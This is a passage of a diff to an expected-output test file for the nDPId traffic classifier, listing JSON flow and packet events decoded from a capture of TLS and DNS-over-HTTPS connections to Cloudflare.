-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"thread_ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 